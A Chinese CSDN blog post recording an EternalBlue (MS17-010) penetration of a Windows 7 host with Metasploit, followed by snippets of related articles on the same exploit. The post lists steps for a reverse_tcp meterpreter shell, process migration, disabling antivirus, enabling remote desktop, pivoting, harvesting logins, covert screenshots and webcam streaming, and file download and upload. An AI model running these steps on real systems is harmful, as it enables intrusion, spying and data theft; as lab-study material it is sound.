1、(信息收集)记录一次使用永恒之蓝的渗透过程

最新推荐文章于 2024-05-29 11:22:22 发布
最新推荐文章于 2024-05-29 11:22:22 发布
阅读量1.2k 收藏 9
点赞数
分类专栏: Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40989258/article/details/88578254
版权

一、通过nmap扫描得知目标机开放了445端口,运行的操作版本为WIN7
在这里插入图片描述2、尝试使用永恒之蓝进行渗透
在这里插入图片描述
使用windows/x64/meterpreter/reverse_tcp PAYLOAD
设置好各项参数
成功进入meterperter工具
使用getpid获取Meterpreter Shell的进程号
在这里插入图片描述
继续使用ps查看本机运行的进程,选择一个稳定的系统进程,将shell迁移过去
在这里插入图片描述3、或者使用自动迁移命令 run post/windows/manage/migrate
在这里插入图片描述
4、获取目标机系统信息,查看是否运行在虚拟机上,查询运行时间,查看完整网络设置
在这里插入图片描述
5、关闭目标机器杀毒软件,开启远程桌面
在这里插入图片描述6、添加一条路由,然后就可以借助被攻陷的主机对其他网络进行攻击了。列举当前有多少用户登陆了目标机,可以看到用户XinSai在登录中。
在这里插入图片描述7、列举安装在目标机上的应用程序
在这里插入图片描述8、抓取自动登录的用户名和密码
在这里插入图片描述木有设置自动登录密码下去试试

9、屏幕截图与录像直播
1、load espia 插件,然后输入screengrab或者screenshot获取截图
然后使用’eog+照片path’即可查看,eog,即linux的内置图片查看器 eye of gmone 的缩写。
在这里插入图片描述
webcam_list查看目标机摄像头列表
webcam_snap打开摄像头并拍一张照片
webcam_stream开启直播模式,使用file:///root/xxx.html查看直播

shell进入目标机Shell下面,由于Linux和Windows编码不同会乱码,使用chcp 65001解决,exit结束会话。
search -f *.txt -d c:\ #搜索c盘中所有以.txt为后缀的文件 -f 搜索模式 -d 指定目录。
download c:\test.txt /root
upload /root/test.txt c:\

daxi0ng
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
浅谈MS17-010永恒之蓝漏洞利用(渗透,后渗透)
m0_70383208的博客
05-28 512
永恒之蓝作为一代人的回忆,如今已无法对当下主流windows系统构成威胁(主要是对win7 以上系统),但对win2008依然有可能构成(假定这个win2008服务器没有打上针对永恒之蓝的补丁).下面我们看一下,这个病毒曾经是如何潜伏进个人2008系统的. 入侵所需工具,Kali攻击机 2008靶机(确保靶机上没有针对永恒之蓝的补丁) 环境上:假定2008和服务器所处同一个网段内 首先我们需要打开kali 接着我们使用一款主动扫描工具nmap 看能否在kali上扫到这个目标主机 我们输入nmap
浅谈MS17-010永恒之蓝漏洞利用(渗透,后渗透)2
m0_70383208的博客
05-28 491
接着上面的成功渗透的结果,我们可以看到一个meterpreter,我们可以输入命令查看当前用户信息 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 接着我们需要使用一个后渗透模块kiwi-后渗透阶段的一款利器. 输入load kiwi //加载kiwi,如下图 接下来我们需要进行进程迁移,先使用ps 查看当前进程 将 SYSTEM 权限 迁移为 Administrator meterpreter > ps
永恒之蓝漏洞攻击完整步骤
G_Fu_Q的博客
11-07 9050
kali攻击机 windows2003/windows2008被攻击机 ip:192.168.15.129 1.进行端口扫描 nmap -Pn -sV -T4 ip地址 明白445端口和3389端口open,3389关闭现在无所谓,如果开启以后拿到权限以后就不用做开启3389端口的操作 2.漏洞脚本检测 nmap --script=vuln 192.168.15.129(ip地址) 看出ms17-010漏洞可以攻击 3.msfconsole测试 msfconsole 4.
永恒之蓝(MS17-010)详解
最新发布
m0_64481831的博客
05-29 867
SMB是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居都是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。SMB工作原理1、客户端发送一个SMB negport请求数据包,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可用的协议版本则返回0xFFFFH,结束通信。
反黑风暴·记一次遭遇 SSDP DDoS 和 EternalBlue(永恒之蓝)攻击经历
12-08 7415
反黑风暴·记一次遭遇 SSDP DDoS 和 EternalBlue(永恒之蓝)攻击经历前言故事一:SSDP DDoS故事二:EternalBlue(永恒之蓝)总结参考 作者:高玉涵 时间:2021.12.07 15:45 博客:blog.csdn.net/cg_i 前言  就在昨天下午我所处的内网被 DDoS 攻击,万幸的是攻击来自内部,除所处网络因攻击不堪重负瘫痪,期间并未波及其它。因发生在内部,定位也较为轻松,找到中毒的电脑,拔掉它的网线、杀毒、打上补丁,故障排除。本想“事去佛衣了”没曾想,今天一大早
ms17-010-永恒之蓝漏洞利用教程
浅笑996的博客
08-18 7638
永恒之蓝漏洞利用实验教程 1.打开虚拟机 启动kali-linux 启动windows7(未装补丁) 2.获取IP地址(ifconfig ipconfig) kali-linux :192.168.0.129 windows7 : 192.168.0.130 3. kali-linux输入msfconsole启动msf(若不是root登陆需sudo提升权限...
渗透基础笔记+作业(永恒之蓝复现)
09-08
总结起来,渗透测试是一个综合性的过程,涵盖了情报收集、威胁建模、漏洞分析、渗透攻击和后渗透操作,旨在全面评估系统的安全性。对于特定的漏洞如“永恒之蓝”,了解其工作原理和复现过程,对于提高网络安全防护至...
EternalBlue永恒之蓝渗透测试.html
03-02
永恒之蓝漏洞渗透测试
小计一次永恒之蓝实战
08-20
一次局域网内的永恒之蓝实战,msf的一次小实战。
永恒之蓝检测.zip
10-20
这个压缩包提供了一次学习和了解永恒之蓝攻击以及如何防范的机会。对于从事IT工作的人来说,了解和掌握这些知识不仅可以保护自己的系统,也可以帮助他人避免遭受类似的威胁。同时,关注网络安全工具的更新,能够提高...
win2012R2永恒之蓝安全补丁.zip
05-12
KB4012213是针对Windows 8.1和Windows Server 2012 R2的一个安全更新,修复了永恒之蓝利用的SMBv1漏洞。这个补丁不仅堵住了漏洞,还增强了系统的安全性,降低了被恶意软件感染的风险。安装KB4012213后,系统可以防止...
kali之永恒之蓝使用流程(操作全套步骤)
m0_63028223的博客
04-01 5097
kali之永恒之蓝使用流程
永恒之蓝漏洞复现
m0_62392732的博客
12-16 1985
实验目的:通过对目标靶机的渗透过程,了解永恒之蓝的危害 系统环境:Kali Linux 2、win7靶机 实验工具:不限 实验步骤 具体操作: 首先下载并安装win7虚拟机,打开后关闭防火墙 扫描本机ip 用Kali扫描同网段的存活IP: 判断ip地址为192.168.42.133 Nmap此地址 此操作可以发现是win7系统并且455端口是开的,可以攻击 输入攻击指令 搜索永恒之蓝模块: search ms17_010 我们这里使用第三个模块,目的是扫
关于MS17-010 永恒之蓝的复现过程
PigLL的博客
08-18 253
实验环境 目标机:win 7 攻击机:kali 实验环境均在虚拟机中进行,模式为NAT模式,使他们处于同一网段中。 首先查看目标机win 7的IP kali开启msf 使用这个模块查看目标机是否存在漏洞 设置目标主机,发现存在漏洞 使用攻击模块 用show options查看设置的选项 然后进行设置选项 设置目标主机 shell拿到权限 ...
kali基础渗透学习,永恒之蓝,木马实战
killsime的博客
04-08 1578
即 MetaSploit Framework,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。可以满足渗透测试的全过程metasploit让复杂的漏洞攻击流程变的非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击本质是利用别人开发好的工具,只能对一些老旧系统攻击如下,模拟使用msf利用永恒之蓝漏洞(因为可以导致蓝屏命名)在终端输入下面代码启动msfdb initmsfconsole可以db_status。
【网络安全】用永恒之蓝(Eternal blue)测试windows系统的安全性
茗染云华 荆挑赋樱
11-30 1503
③metasploit 攻击 windows操作系统:如永恒之蓝漏洞,利用windows操作系统的SMB漏洞可以获取系统最高权限,端口为445。②metasploit:kali最强渗透工具。二、kali、metasploit、metasploit 攻击 windows操作系统、metasploit 攻击 永恒之蓝 全流程。②在攻击机的终端,攻击目标地址,使用命令:set RHOSTS 具体目标地址或网段。target port=rport=目标的端口(永恒之蓝漏洞的默认端口=445)
永恒之蓝漏洞利用及攻击
热门推荐
wwl012345的博客
04-20 9万+
一、基础知识介绍: 1.何为永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
勒索病毒“WannaCry”之复现过程永恒之蓝
weixin_40950781的博客
08-09 6737
勒索病毒“WannaCry”复现(永恒之蓝)1.漏洞简述2.漏洞复现2.1复现环境2.3复现过程2.3.3 开始攻击3.结语4.防范 1.漏洞简述 “永恒之蓝”利用Windows系统的SMB漏洞获取系统的最高权限,该工具通过恶意代码扫描开放445端口的Windows系统;被扫描到的Windows系统,只要开机上线,不要要用户进行任何操作,即可通过共享漏洞上传wannacry勒索病毒,远程控制木马等...
kali永恒之蓝渗透win8
04-28
针对Win8系统的渗透测试,可以使用Kali Linux中的永恒之蓝(EternalBlue)漏洞进行攻击。以下是一些步骤: 1. 首先,需要在Kali Linux中安装Metasploit框架,Metasploit是一款渗透测试工具,可以用来探测和利用漏洞。 2. 接着,使用Metasploit框架中的“eternalblue_doublepulsar”模块,该模块可以利用永恒之蓝漏洞攻击Win8系统。 3. 在攻击之前,需要获取Win8系统的IP地址,可以使用nmap等端口扫描工具进行扫描获取。 4. 利用Metasploit框架中的“eternalblue_doublepulsar”模块,输入Win8系统的IP地址,然后开始攻击。 5. 如果攻击成功,可以获取Win8系统的权限,并且可以执行命令,比如获取敏感信息、远程控制系统等。 需要注意的是,进行渗透测试需要遵守法律法规,严禁对未授权的系统进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值